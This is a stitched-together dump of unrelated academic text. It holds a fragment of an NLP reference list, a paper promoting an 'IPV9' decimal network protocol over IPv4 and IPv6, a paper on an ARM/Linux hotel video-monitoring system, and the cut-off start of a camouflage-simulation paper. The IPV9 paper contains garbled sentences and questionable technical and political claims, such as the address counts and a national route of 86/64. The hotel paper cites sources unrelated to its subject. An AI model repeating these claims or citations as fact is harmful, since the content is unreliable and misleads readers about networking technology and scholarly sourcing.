NAACL-HLT. Mike Mintz, Steven Bills, Rion Snow, and Dan Jurafsky. 2009. Distant supervision for relation extraction with- out labeled data. In Proceedings of ACL-IJCNLP. Joakim Nivre, Johan Hall, and Jens Nilsson. 2004. Memory-based dependency parsing. In Proceedings of CoNLL. Sebastian Riedel, Limin Yao, and Andrew McCallum. 2010. Modeling relations and their mentions without labeled text. In Proceedings of ECML/PKDD. Sebastian Riedel, Limin Yao, Andrew McCallum, and Benjamin M Marlin. 2013. Relation extraction with matrix factorization and universal schemas. In Pro- ceedings of NAACL-HLT. Alan Ritter, Sam Clark, Mausam, and Oren Etzioni. 2011. Named entity recognition in tweets: An experi- mental study. Proceedings of EMNLP. Stuart J. Russell, Peter Norvig, John F. Candy, Jiten- dra M. Malik, and Douglas D. Edwards. 1996. Ar- tificial intelligence: a modern approach. Benjamin Snyder and Regina Barzilay. 2007. Database- text alignment via structured multilabel classification. In Proceedings of IJCAI. Mihai Surdeanu, Julie Tibshirani, Ramesh Nallapati, and Christopher D. Manning. 2012. Multi-instance multi- label learning for relation extraction. In Proceedings of EMNLP-Conll. Shingo Takamatsu, Issei Sato, and Hiroshi Nakagawa. 2012. Reducing wrong labels in distant supervision for relation extraction. In Proceedings ACL. Partha Pratim Talukdar and Fernando Pereira. 2010. Experiments in graph-based semi-supervised learning methods for class-instance acquisition. In Proceedings of ACL. Fei Wu and Daniel S. Weld. 2007. Autonomously se- mantifying wikipedia. In Proceedings of CIKM. Wei Xu, Raphael Hoffmann Le Zhao, and Ralph Grish- man. 2013. Filling knowledge base gaps for distant supervision of relation extraction. In Proceedings of ACL. Luke S. Zettlemoyer and Michael Collins. 2007. Online learning of relaxed ccg grammars for parsing to logical form. In EMNLP-CoNLL. 377 378 work_yrxg3hcbpjelzfodvpcbszljxy ---- DOI: 10.21307/ijanmc-2019-062 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 79 Comparative Research on Key Technologies from IPv4, IPv6 to IPV9 Sun Huai School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, China e-mail: sh1227467868@163.com Liu Zhang School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, China e-mail: 604463203@qq.com Abstract—Since the United States developed the IPv4 protocol based on TCP/IP in the 1970s, it has been more than 30 years old. IPv4 is the "fourth edition of the Internet Protocol." From a technical point of view, although IPv4 has a brilliant performance in the past, it seems to have revealed many drawbacks. With the addition of multimedia data streams and security considerations, IPv4's address space is running out of crisis, and IPv4 is no longer sufficient. Under such circumstances, IPv6 was born as needed. When designing IPv6, not only the IPv4 address space was expanded, but also the parties to the original IPv4 protocol were reconsidered and a lot of improvements were made. In addition to the large number of addresses, there is higher security, better manageability, and better support for QoS and multicast technologies. It is an abbreviation for "6th Edition of Internet Protocol." IPV9 was proposed in 1992 to replace the IPv4 with the ISO/OSI CLNP protocol, using the 20B NSAP address and the platform for the available OSI transport protocol. Later, DDNS was introduced and gradually developed into an IPV9 decimal network with a 256-bit address. IPV9 masters "the right to control the use of the Internet, the allocation of IP addresses, the initiative of information monitoring, the right to use routing protocols, and the ownership of technology patents." Therefore, the research and application of a new generation of Internet Protocol Next Generation has become a worldwide hotspot. Keywords-IPv4; IPv6; IPV9 I. INTRODUCTION Internet Protocol (IP) is a communication protocol designed for computers to communicate with each other in the network. IP provides a common rule for computers to access the Internet. The Internet has become the largest open network in the world. With the rapid development of the global economy, the advancement of communication technology and network technology, the penetration rate of computers and mobile terminals is getting higher and higher. The problems with IPv4 are also exposed [1]. For example, in the address space, performance, network security and routing bottlenecks, IPv4 makes it difficult to meet the needs of the Internet in the future. To solve the IPv4 many problems, IPv6, IPV9 and other Internet protocols have been born. II. THE STATUS OF IPV4 IPv4 plays a key role in the development of the network. However, with the continuous expansion of the network scale, it can no longer meet the network development needs. Firstly, the address resources are exhausted, which directly leads to the address crisis, although the CIDR technology is not classified. The network address translation NAT technology alleviated the address crisis, but still cannot solve the problem. Secondly, the routing table expansion problem, the topology structure of the address space directly causes International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 80 the address allocation form to be independent of the network topology. As the number of networks and routers increases, the excessively expanded routing table increases the lookup and storage overhead and becomes the bottleneck of the Internet. At the same time, the length of the packet header is not fixed, and it is very inconvenient to use hardware to implement path extraction, analysis and selection, so it is difficult to improve the routing data throughput rate. There is also an uneven distribution of IP addresses. Since most of the addresses are from the United States, most of the addresses are in the United States, resulting in a serious imbalance in IP address allocation. There is also a lack of QoS (Quality of Service) support. The design does not introduce the QoS concept. The original intention is for the military. It does not want to be open to the outside world. Therefore, it is lacking in quality of service QoS and security. It is difficult to be real-time. Commercial services such as multimedia and mobile IP provide rich QoS functions. Although protocols such as RSVP have been developed to provide QoS support, the cost of planning and constructing IP networks is relatively high. III. THE CHARACTERISTICS OF IPV6 The IPv4 protocol is currently widely deployed Internet protocols. The IPv4 protocol is simple, easy to implement, and interoperable. However, with the rapid development of the Internet, the shortage of IPv4 design is becoming more and more obvious. The number of IPv4 address spaces is insufficient and the number of routing table entries to be maintained is too large[2]. Compared with IPv4, IPv6 has the following characteristics. 1) IPv6 has a larger address space. IPv4 specified IP address length is 32 bits, there are 2^32-1 addresses, and IPv6 the IP address length is 128 bits, there are 2^ 128-1 addresses. Compared to the 32 -bit address space, its address space is greatly increased. 2) IPv6 uses a smaller routing table. The IPv6 address allocation follows the principle of aggregation (Aggregation) at the beginning, which enables the router to use a record (Entry) to represent a subnet in the routing table, which greatly reduces the length of the routing table in the router and improves router forwarding. The speed of the packet. 3) IPv6 adds enhanced multicast (Multicast) support and the support of convection(Flow Control), which makes multimedia applications on the network has made great development opportunity for quality of service(QoS , at Quality of Service) provides control Good network platform. 4) IPv6 has added support for Auto Configuration. This is an improvement and extension of the DHCP protocol, making network management more convenient and faster. 5) Better header format. IPV6 uses a new header format with options that are separate from the base header and can be inserted between the base header and the upper layer data if needed. This simplifies and speeds up the routing process because most of the options do not need to be routed. Although IPv6 has obvious advantages, the number of IPv4 routers is huge. The transition from IPv4 to IPv6 is a gradual process, and IPv6 must have backward compatibility. Therefore, the coexistence of IPv6 and IPv4 will coexist for a long time. Moreover, IPv6 has great drawbacks in the design of its address structure. IPv6 confuses the network hierarchy in design. The interface ID embeds the address of the physical layer into the logical address layer. In this respect, the space of the physical address forms a restriction on the IP address space, and the security does not belong to the IP layer. Designing security technologies at the IP layer should not be. Because with the development of security technology, the security method and key length will continue to change, so the development of security technology will eventually lead to the redesign of IP addresses. Due to International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 81 the chaos of network-level logical relationships, IPv6 creates far more new problems than it solves. IV. DEFINITION OF IPV9 The new IPV9 network covers three new technologies: address coding design, new addressing mechanism and new address architecture design. It aims to build a core technology system based on the underlying IP network. On this basis, a new framework can be formed. Connected and compatible with a network system that covers existing networks (Internet with IPv4 and IPv6 technologies). 2011 US government agency has the authority of the professional and technical confirmation from the law, my country has IP framework with the United States Internet network to the prior art, proprietary technology core network sovereignty[3]. This is the patented technology of IPV9 (Method of using whole digital code to assign address for computer). The official patent name is “the method of allocating addresses to computers using full digital coding”. The IPV9 protocol refers to the 0-9 Arabic digital network as the virtual IP address, and uses decimal as the text representation method, which is a convenient way to find online users. In order to improve efficiency and facilitate end users, some of the addresses can be directly used for domain name. At the same time, it is also called “new generation security and reliable information integrated network protocol”. It uses the classification and coding of the original computer network, cable radio and television network and telecommunication network. V. THE ARCHITECTURE OF IPV9 By using IPV9 routers, clients, protocol conversion routers and other devices to build a pure IPV9 network, IPV9/IPv4 hybrid network to achieve a new generation of Internet systems with independent and secure intellectual property rights. Including the domestically controllable IPV9 future network root domain name system, promote technology convergence, service integration, data convergence, and achieve cross-level, cross-regional, cross-system, cross-department, cross-business collaborative management and services. With the data concentration and sharing as the way, we will build a national integrated national big data center, accelerate the promotion of domestically-controlled independent control alternative plans, and build a safe and controllable information technology system. Separate from the control of the US domain name system and realize the independent domain name system. In order to speed up the promotion of China's international discourse rights and rules-making rights to cyberspace, we will make unremitting efforts towards building a network-strengthening country. In the existing TCP/IP protocol, conventional packet switching cannot support true real-time applications and circuit switching, and supports applications such as transmitting sound or images in circuits in a four-layer protocol. With the demand for voice, image and data triple play, the incompatibility of human-machine interface and the environmental protection requirements for redundant links, especially the original security mechanism is unreasonable, it is imperative to establish a new network theory foundation. So in 2001, China established the Decimal Network Standard Working Group (also known as IPV9 Working Group) to study and implement security-based first-come-authentication communication rules, address encryption, as short as 16 bits up to 2048 bits of address space, resource reservation, virtual real circuit The communication network transmission mode, such as character direct addressing and three-layer four-layer hybrid network architecture, was first proposed by China and has formed a demonstration project. The existing TCP/IP protocol is a connectionless, unreliable packet protocol with a maximum packet length of 1514 bytes. The TCP/IP/M protocol of IPV9, which is led by China, not only inherits the connectionless and unreliable packet protocol of the International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 82 existing TCP/IP protocol, but also develops absolute code stream and long stream code. The data packet can reach tens of megabytes or more. After three can be transmitted directly by telephone and cable television data link is established without affecting the existing transmission network until four transmission new transmission theory until they have finished the removal of three of four transport protocol. And continue to develop and develop and manufacture the ISO-based future network "naming and addressing" and "safety" led by China. Such as: 1) Based on three / new four-core network architecture of PC desktops and mobile phone network Operating system kernel. 2) An instruction set of a new kernel based on a three-layer / four-layer network architecture network operating system. 3) A chip based on a new core of a three-layer / four-layer network operating system architecture. 4) The IPV9 block domain of the new kernel based on the three-layer / four-layer network operating system architecture. 5) New operating network for optical switching and router based on network operating system. 6) Research and development based on the header encryption system for communication after verification and IPV9 based mobile phone and industrial control. VI. THE ADVANTAGE OF IPV9 Compared with the traditional IPv4 and IPv6, the changes of IPV9 mainly include the following aspects. IPV9 has a larger address space than IPv4 and IPv6. The address length of IPv4 is 32 bits, that is, there are 2^32-1 addresses. The address length of IPv6 is 128 bits, that is, there are 2^128-1 addresses. But IPV9 increases the address capacity to 256 bits, that is, there are 2^ 256-1 addresses. In mobile communications, the biggest drawback of IPv4 is that there are not enough addresses available for mobile devices that people use. If IPv6 is widely used, the problem of IP shortages around the world will be solved. B. Digital Domain Name System In the digital domain name system, IPv4 and IPv6 are domain name resolutions through the United States, while IPV9 is set by countries, which avoids the limitation of IP addresses and reduces the use of domain names by the state. IPV9 is a "decimal network" with independent intellectual property rights developed according to the invention patent "Method of Allocating Addresses for Computers Using All Digital Encoding". Its decimal network introduces a digital domain name system, which can be used to convert the original binary through a decimal network. The address is converted into decimal text, allowing the computers on the network to connect to each other, to communicate and transmit data to each other, and to be compatible with Chinese and English domain names. The digital domain name technology used by the IPV9 decimal network reduces the difficulty of network management, the vast address space and the newly added security mechanism, and solves many problems faced by the existing IPv4 [4]. The advantages of other aspects can also meet the different levels of demand for various devices in the future. C. Routing In terms of routing, the increase in the size of the Internet has caused the IPv4 routing table to swell, making the efficiency of network routing declining. The emergence of IPV9 solves this problem, and the optimization of routing improves the efficiency of the network. IPV9 establishes an IPV9 tunnel between the mobile unit and the proxy , and then relays the data packet sent to the mobile unit's home address received by the “proxy” used as the mobile unit to the current location of the mobile unit through the tunnel, thereby implementing Network terminal mobility support. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 83 The IPv6 routing table is smaller than IPv4. IPv6 address allocation follows the principle of aggregation, which enables the router to use a record to represent a subnet in the table, which greatly reduces the length of the routing table in the router and improves the routing table forwarding[5]. IPV9’s routing table is very small. IPV9’s address allocation follows the principle of geospatial clustering. This allows a record in the IPV9 router to represent a country subnet and an application subnet, greatly reducing the routing in the router. The length and cleanliness of the table increases the speed at which the routing table forwards packets. At the same time, this subnet can express a specific geographical location. According to this logic, only one route is needed between the country and the country. For example, the route to China is 86/64. The IPv4 routing table is extremely large and irregular. The IPv6 routing table is smaller than IPv4, but the IPv6 routing table does not contain geographic information and the routing is cluttered. D. Security IPV9 encryption technology and authentication technology have significantly improved than IPv4, and the encryption technology proposed by IPV9 is difficult to decipher at the physical level, and the confidential performance has been significantly improved. However, at the level of network information security, there are still many factors that cause insecure network information in China. The fundamental reason is that the root servers of IPv4 and IPv6 are in the United States. Many patents related to the network are in the hands of the United States. At the same time, the risk of information exposure may also be introduced. The IPV9 is to have independent intellectual property rights of Internet Protocol, can bring a lot of protection to the information security of the country. IPV9’s address space enables end-to-end secure transmission, making it possible for people to use devices to directly assign addresses[6]. Both IPv4 and IPv6 do not have the concept of national geographic location. Most of their domain name resolution servers are in the United States, and IPV9 proposes the concept of “sovereign equality”, which enables each country to have its own root domain name system, which guarantees that all countries are on the Internet. VII. APPLICATION RESEARCH OF IPV9 SYSTEM We designed the following 10 test scenarios to fully reflect the features and advantages of the IPV9 network system. Covers some functions of the IPV9 network system, and the test case selects several typical scenarios for testing. A. Application 1—Pure the IPV9 Network Architecture This application implements a pure IPV9 network architecture. The simplest system includes IPV9 client / server A, IPV9 client / server B, 10G IPV9 Routers C, D. The network topology is shown in Figure 1. Figure 1. Pure IPV9 client - server test topology The pure IPV9 client - server scenario is suitable for building a pure IPV9 network in an area, which is suitable for establishing an independent IPV9 network system. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 84 B. Application 2—IPv4 network by purely the IPV9 connected to the network This application implements IPv4 network applications through pure IPV9 network communication. The simplest system includes IPv4 client / server A, IPv4 client / server B, IPV9 10G router C, D. The network topology is shown in Figure 2. Figure 2. The IPv4 network by purely the IPV9 connected to the test network topology This scenario is applicable to IPv4 networks in several different areas connected through the IPV9 core network to implement penetration access between different IPv4 networks. One of the main features is that in addition to the existing IPv4 network, other areas use IPV9 protocol transmission, which requires special network connections (such as fiber, DDN line, etc.) between different IPv4 networks. C. Application 3—IPv4 network through 9over4 connection tunnel This application implements IPv4 network through 9over4 tunnel communication, the simplest system comprising an IPv4 client / server A, IPv4 client / server B, the IPV9 1OG routers C, D. The biggest difference between scenario 3 and scenario 2 is that the IPv4 public network address between routers C and D is based on 9over4 tunnel communication. This scenario simulates the IPV9 network using the existing IPv4 public network to achieve IPV9 network connectivity in different geographic regions under the current conditions, and has the ability to build a national network. The network topology is shown in Figure 3. Figure 3. The IPv4 network through 9over4 connection topology tunnel test IPv4 networks in different areas are connected through the IPV9 over IPv4 core network to achieve transparent access between different IPv4 networks. A major feature is the use of existing IPv4 networks between core networks, communicating via 9over4 tunnel mode. You can use the existing IPv4 public network to quickly establish connections between different regional IPv4 networks and implement penetration access. D. Application 4—The IPV9 network via 9over4 tunnel connection This application implements the IPV9 network applications by 9over4 tunnel communication, the simplest system comprising the IPV9 client / server A, the IPV9 client / server B, the IPV9 1OG routers C, D. The biggest difference between this scenario 4 and scenario 1 is that the IPv4 public network address between routers C and D is based on 9over4 tunnel International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 85 communication. This scenario simulates the IPV9 network using the existing IPv4 public network to achieve IPV9 network connectivity in different geographic regions under the current conditions, and has the ability to build a national network. The network topology is shown in Figure 4. Figure 4. The IPv4 network through 9over4 connection topology tunnel test The application implements the IPV9 network islands of N scenarios 1 to be connected through the IPV9 over IPv4 core network to implement penetration access between different IPV9 networks. A major feature is the use of existing IPv4 networks between core networks, communicating via 9over4 tunnel mode. Can use existing IPv4 quick connect different regions of the public network the IPV9 network, and access to achieve penetration. E. Application 5—hybrid network architecture In this application, the client side of the IPV9 access router accesses the IPv4 network at the same time, the IPV9 network, and the network side of multiple IPV9 access routers access the user side of the same core router, and the network side of the core router Simultaneous access to IPV9 networks and IPv4 networks (including public networks). Can be achieved (1) IPv4 clients penetrate the network access to other subnets IPv4 clients. (2) IPv4 client normal access to the Internet. (3) IPV9 clients to access other autonomous domain of IPV9 clients. (4) Between the access routers using the OSPFV9 dynamic router protocol networking. (5) The IPV9 core routers can choose to use the 9over4 network to access the Shanghai node IPV9 network, or use the pure IPV9 protocol to access the Beijing node IPV9 network. The network topology is shown in Figure5. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 86 Figure 5. The IPV9 hybrid network topology architecture test This application scenario is mainly used to build an IPV9 network environment, seamlessly integrate IPv4 networks, and IPV9 networks. All IPv4, IPV9 network islands are connected using the IPV9 protocol or the existing IPv4 public network. It is convenient and quick to connect independent networks in different regions to form a national unified network by using the IPV9 network system. VIII. DEVELOPMENT AND OBSTACLES Whether transitioning from IPv4 to IPv6 or evolving to IPV9 is a gradual process, it is necessary to maintain mature services based on IPv4 and support interoperability between new and old protocols. Net network only charge network access fees, mainstream technology not well supported by successful business models, which is IPV9 of fatal weakness. IPv6 is supported by governments and vendors around the world. IPV9 supporter limited, difficult to scale and provide good service in the short term, relying on China's own development, it is difficult to fight IPv6 research network externalities and spend a huge human and financial resources have formed the results. It is difficult through the inlet into commercial use the network market to form economies of scale and reduce costs. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 87 IX. CONCLUSION With the development of the Internet, the number of Internet users is increasing, and the lack of IPv4 address resources has become a bottleneck restricting its development. Regardless of the evolution from IPv4 to IPv6 or to IPV9, IPv4-based mature services are required to support protocol compatibility. IPV9 absorbs a large number of advanced design concepts and technologies at home and abroad in the design and development process. It is a secure and controllable network information platform that can be compatible with the current IPv4 and IPv6 Internet, and can operate independently. It is suitable for establishment. National government, banks and other private networks. The IPV9 network has established a digital domain name resolution center in Shanghai, and has established sub-centers in Beijing, Changsha, and Macao, and is operating normally. In military networks and some government networks, IPV9 may gain a place from the perspective of national security. Regardless of future trends, providing a safe, efficient, stable and reliable network environment is our common goal. REFERENCE [1] Xie Jianping etc. Method of using whole digital code to assign address for computer [P]. US: 8082365, 2011.12. [2] Zang Qianli etc. A Survey on IPv6 Address Structure Standardization Researches [J]. Chinese Journal of Computers. 2019: 1-23 [2019-03-04]. [3] Xie Jianping etc. A method of assigning addresses to network computers using the full decimal algorithm [P]. CN: ZL00135182.6, 2004.2.6. [4] V. Fuller, T. Li,Network Working Group. Classless Inter-Domain Routing (CIDR): an Address Assignment and Aggregation Strategy, RFC-1519, 1993.9. [5] Kohler E, Li J, Paxson V, et al. Observed Structure of Addresses in IP Traffic [J]. IEEE/ACM Transactions on Networking, 2006, 14(6):1207-1218. [6] Information technology-Future Network- Problem statement and requirement-Part 2: Naming and addressing, ISO/IEC DTR 29181-2, 2014, 12. work_yvqupgxxtvfxzpqganvqyp7f3m ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 23 Design of the Hotel Monitoring System for the Image and Video Collection Wang Pengfei School of Leisure Management Xi’an eurasia University Xi’an, China e-mail: wangpf135@126.com Abstract—With the more attention of the security of the hotels, an effective hotel monitoring system was required. Based on the Samsung S3C2440, the proposed system uses the Linux system to accomplish the intelligent video surveillance. Using the image acquisition process and the embedded BOA server, designed an intelligent video image acquisition system. The system capturing image by the USB camera and building an embedded Web server, which complete the image acquisition, image processing, and the image transmission function. It can see the acquire result on to the LAN at the PC via the webpage. It could complete the function of image acquisition, image processing, image transmission, the realization of ultimate in local area net PC through a Web view the result. Keywords-Video Sensor; Linux; USB Camera; V4L2; Web Server I. INTRODUCTION There are many products in the market for hotel monitoring, but these products are often expensive and cannot be widely applied to all kinds of hotels. Based on the above, this system using Linux operation system based on the ARM9 processor to construct the monitoring system, which can be widely used in the hotel lobby, stairs and building dead ends, so as to ensure the real-time monitoring of the hotel in all directions [1]. II. THE STRUCTURE OF THE SYSTEMYPE This system is based on the Linux embedded system, mainly composed of the software and the hardware [2]. It includes the image and video collection, the display module, the data processing and the transmission module. The network transmission environment is LAN. The structure of the system is shown in Figure 1. Data process module Video display module Local network D a ta tra n s m is s io n m o d u le Image acquisition module Figure 1. Overall structure diagram of the system The image acquisition module collects the image data through the USB camera [3]. The data processing module mainly deals with the user commands and the operation of the generated data. Data transmission module is currently popular browser /Web server mode, through the embedded Web server communicates the client PC browser between the HTTP data format. The image display module is the PC port under the LAN, which sends data requests to the Web server through the browser web pages [4]. III. THE MONITORING SYSTEM STRUCTURESTRUCTURE According to the functional requirements of this system, the following hardware devices are needed. The specific hardware structure is showed in Figure 2. ARM9 S3C2440 (Linux) PC (Win7) USB Camera DM9000 Net RS232 SDRAM/Flash Wireless Net Router Web video display WireTCP/IP TCP/IP Wireless Serial debug HTML5 CGI Serial debug Figure 2. The system hardware structure In Figure 2, ARM9 S3C2440 is the main chip of the system. The image data was collected by the USB camera; the collected images stored in SDRAM for transferred facilitate [5]. The video data stored in Flash. By the DM9000 card, the network module could communicate with the development board. At the same time, in order to realize the serial communication interface RS232 combined the monitoring system and PC. The wireless network connects the wireless LAN and the development board for the wireless communication. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 24 IV. DESIGN AND IMPLEMENTATION OF 3 IMAGE ACQUISITION MODULE A. Design of software system Based on the Linux operation system, the image acquisition program, the Web server BOA and the CGI/HTML5 were combined together [6]. The software structure is shown in Figure 3. Image acquisition program Web server BOA Image display program CGI Web display program HTML5 Linux operation system Figure 3. The system software structure The operating system uses the management processors, the memory, the devices and the user interfaces. The Linux operation system could be reduced for the requirement function [7]. The application program could visit the device by the related API and then controls the hardware through the driver. B. Design and implementation of the image acquisition module V4L (Video4 Linux) is the driven structure of the video device in the Linux kernel. It provides a unified function interface for the upper-layer applications accessing to the underlying video devices. V4L2 could support the multiple hardware devices and the running framework of V4L2 in Linux is shown in Figure 4. Device/video X V4L2 device number (81, X) Character device driver core V4L2 driver core (V4L2-dev.c) V4L2 driver (struct video_device) Camera driver Camera System Core Application Hardware Figure 4. The structure of V4L2 From Figure 4, the frame structure mainly includes four parts. It is showed in Table 1. TABLE 1. THE FRAME STRUCTURE OF V4L2 Name Function Character device driver core V4L2 is the character device that has all the features of a character device to provide an interface to the user. V4L2 driver core Build a standard video device driver framework in the kernel and provide a uniform interface function for video operations. V4L2 driver device According to the platform characteristics, implements the V4L2 driver, including registration the video device. Camera device driver Power, working clock, video image cutting and the IO interface. Implement various device control methods for upper level calls and registration V4L2_subdev. C. Video image acquisition programs After the embedded processor gets the image information, the JPEG compress program is executed and the image acquisition is completed. Finally, the video coding is carried out by the MPEG-4 video coding standard. The process of video image acquisition is shown in Figure 5. Start Open the device document Acquire the driver device Memory mapping Single frame collection in video data End of collection Condense the video End Y N Figure 5. The image collection flow chart First, the system creates a file to save the collected image information. Next, open the USB camera's device. With opening the device file, gets the driver information of the device. After the image formatting is completed, the image buffer will be applied [8]. Then establish the mapping of the kernel space image buffer to the user space. Finally, using the camera to capture the image data, the collected data will be saved to the driver's buffer [9]. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 25 D. Design and implementation of image transmission After the video image file collection is well done, the Web server should be established. Through the network protocol, the client can browse the Website and download the files. That is the mainstream browser/server mode [10]. With the characteristics of embedded Linux system and the requirement of the development board hardware resources (DM9000), the communication between the Web server and the client using the TCP/IP protocol. By the CGI program, realizes the video data transmission. The transferred diagram among the development board, server and the client is shown in Figure 6: Video Image Document Web Server Router TCP IP Client 1 Client 2 TCP/IP Figure 6. The net transmission based on the TCP/IP protocol DM9000 net chip sets the IP address and the physical address of the development board. When the development board works in the normal Linux system, connects the RJ45 interface to the router through the cable, the wired/wireless devices in the same local area net can achieve the network communication. V. TEST RESULT OF THE IMAGE TRANSMISSION A. Design of CGI andHTML5 netpage The system could browse and download the video files on the web page which collected by the development board [11]. So the server needs to respond to the request from the client web page and access the files in the server through the CGI common gateway interface program. The CGI program's model in the server is shown in the Figure 7. Client Web Browse BOA Server Common Netgate Interface CGI Program Collect Image File HTTP (HTML) W e b S e rv e r P la tfo rm Figure 7. The flow chart of the CGI The CGI program is running on the server and the client sends a CGI request through the HTML pages to the server. The server receives will be executed after the specified CGI application, then the CGI application sends the result to the client web browser. This result is formatted into HTML format and displayed by the browser. B. The test results In this paper, using our school hotel as an example to implement and test the function of the above system. The system ensures the overall stability and smooth operation of the system, and completes the image video acquisition and the client's web page display [12]. The monitoring result is showed in Figure 8. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 26 Figure 8. The test result of the proposed monitoring system VI. CONCLUSIONS The all-around monitoring of the hotel has become a basic condition for safety. Video surveillance is not only small, stable and safety, but also does not appear the "dead angle" phenomenon than the artificial monitoring. Based on the characteristic, the proposed video acquisition and transmission system has a very good market prospect. ACKNOWLEDGMENT This work was partly supported by Shaanxi Province Social Science Fund Project (NO.2016R022) of China and the scientific research fund project of Shaanxi Provincial Department of Education (17JK1036). REFERENCES [1] D.Zhang, J.Han, and L.Jiang, et al. “Revealing Event Saliency in Unconstrained Video Collection”, IEEE Transactions on Image Processing, vol.26, Jan. 2017, pp.1746-1758, doi:10.1109/TIP.2017.2658957. [2] W H.Gross, Video circuits collection, Analog Circuit Design,2rd ed, vol.3. Elsevier Inc:2015, pp.703-704. [3] D.Hai, T.Hua, “A video processing system for automated traffic data collection of gap size for roundabouts”, Proc. IEEE Symp. Electrical and Computer Engineering, IEEE Press, Jun.2017, pp.1-4, doi:10.1109/CCECE.2017.7946597. [4] X.Zhang, X.Li, and L. K. “Remote video monitoring system based on ARM and Linux”, Microcomputer & Its AApplications, vol.24, Jul. 2012, pp.15-17, doi:10.1109/ICICIP.2012.6391516 [5] E.Aytac, H.Erem, and H.Remzi F, et al. “A novel data collection and monitoring system for health status measures in patients undergoing lateral internal sphincterotomy: The Knowledge Program (TKP)”, Asian Journal of Surgery, vol.38, May. 2015, pp.134-138, doi:10.1016/j.asjsur.2015.01.001. [6] A.Bhuiyan M Z, J.Wu, and G.Wang, et al. “Quality-Guaranteed Event-Sensitive Data Collection and Monitoring in Vibration Sensor Networks”, IEEE Transactions on Industrial Informatics, vol.13, Feb. 2017, pp.572-583, doi:10.1109/TII.2017.2665463. [7] Y.L.Hwang, Y.E. Shin. “Unrestrained Electrocardiograph Based on Textile Electrode and Smartphone Application for Assessment of Bicycle Exercise”, Journal of Biomedical Engineering Research, vol.35, May. 2014, pp.111-118, doi:10.9718/JBER.2014.35.5.111. [8] C.Habib, A. Makhoul, and Darazi R. “Self-Adaptive Data Collection and Fusion for Health Monitoring Based on Body Sensor Networks”, IEEE Transactions on Industrial Informatics, vol.12, Jun. 2016, pp.2342-2352, doi:10.1109/TII.2016.2575800. [9] H.Liang. “Application Function and Daily Management Decision of Hotel Data Center”, Talanta, vol.74, Apr. 2015, pp.977-85, doi:10.2991/icmii-15.2015.174. [10] A.Gunawan, H. C.Lau, and P.Vansteenwegen. “Orienteering Problem: A survey of recent variants, solution approaches and applications”, European Journal of Operational Research, vol.255, Feb. 2016, pp.315-332, doi:org/10.1016/j.ejor.2016.04.059. [11] G.Donatelli, R.Chiche, and Cereatti F, et al. “Endoscopic Drainage of Intra-Abdominal Collection after Bariatric Surgery”, Obesity Surgery, vol.27, Jun.2017, pp.1635-1637, doi:10.1007/s11695-017-2652-3. [12] F. E.Clark, S. L.Davies , and Madigan A W, et al. “Cognitive enrichment for bottlenose Dolphins (Tursiops truncatus): Evaluation of a novel underwater maze device”, Zoo Biology, vol.32, Jun. 2013, pp.608-619, doi:10.1002/zoo.21096. https://doi.org/10.1109/TIP.2017.2658957 https://doi.org/10.1109/CCECE.2017.7946597 https://doi.org/10.1109/ICICIP.2012.6391516 https://doi.org/10.1016/j.asjsur.2015.01.001 https://doi.org/10.1109/TII.2017.2665463 https://doi.org/10.1109/TII.2016.2575800 http://dx.doi.org/10.2991/icmii-15.2015.174 https://doi.org/10.1016/j.ejor.2016.04.059 https://doi.org/10.1007/s11695-017-2652-3 https://doi.org/10.1002/zoo.21096 work_yxwqykdd4bd63dezjbqsgfvk3y ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 126 The Research and Implementation of 3D Scene Simulation of Camouflage Yu Jun School of computer science and engineering Xi'an Technological University Xi'an, 710021, ShanXi, China e-mail: yujun@xatu.edu.cn Li Zhonghua School of computer science and engineering Xi'an Technological University Xi'an, 710021, ShanXi, China e-mail: 761173763@qq.com Hu Zhiyi Engineering Design Institute Army Academy of PLA Beijing, 100000, China e-mail: huzhiyi016v7@163.com Dai Jun School of computer science and engineering Xi'an Technological University Xi'an, 710021, ShanXi, China e-mail: daijun24@qq.com Abstract—Aiming at the problems in the camouflage design of military engineering, such as strong subjectivity and unpredictable camouflage effect, etc. We propose a 3D camouflage scene simulation method based on MFC and Vega Prime technologies. On the basis of real DEM data in an area in American, we use 3D visualization technique to create terrain model and ground object model. The camouflage pattern is applied to the surface of the model by texture mapping technology, and real-time rendering is used. The engine Vega Prime API renders the model and creates a camouflage simulation scenario. The result shows that, the virtual scene of camouflage can be generated by using visual simulation technology, this helps to test the effect of the camouflage pattern. Keywords-Camouflage; Terrain Modeling; Visual Simulation; Digital Elevation Model I. INTRODUCTION Camouflage, as the most basic military camouflage technology, is one of the commonly used method to combat investigation and attack in modern warfare[1]. The commonly used method of Engineering camouflage is to paint camouflage patterns on the surface of the target with dope, however, the effect of this kind of camouflage is influenced by environmental. This usually requires personnel to participate in the evaluation of camouflage effects, so it may consume a lot of resources. Many scholars began to use the Vega prime-based(VP) visual simulation technology to build 3D model of military target or reproduce a realistic environment to achieve realistic simulation results. For example, Zhang[2] combines the development features of MFC application program, gives a 3D visual development method based on multi-process technology, and applies it to the development of a 3D scene of a portable air defense missile simulator software. Yao[3] using the virtual battlefield large terrain visualization features and focuses on the research of large-scale real terrain visualization techniques.Hu[4] made a further improvement on Zhang's foundation[2], he gives a program framework that seamlessly integrates VP under VC++'s MFC library programming environment, optimizing the structure of the system. However, none of the above methods can perform real-time simulation of real 3D space and do not have interactive capabilities, making these methods unsuitable for simulation of engineering camouflage. In response to these problems, this paper is based on the 3D visual simulation method[2-6] and real DEM data, combined with the actual engineering camouflage environment, establish the Vega Prime visual simulation framework based on MFC, design a real-time roaming system simulation of a camouflage scene. II. THE OVERALL DESIGN OF THE SIMULATION SYSTEM The camouflage 3D scene simulation system includes two parts: 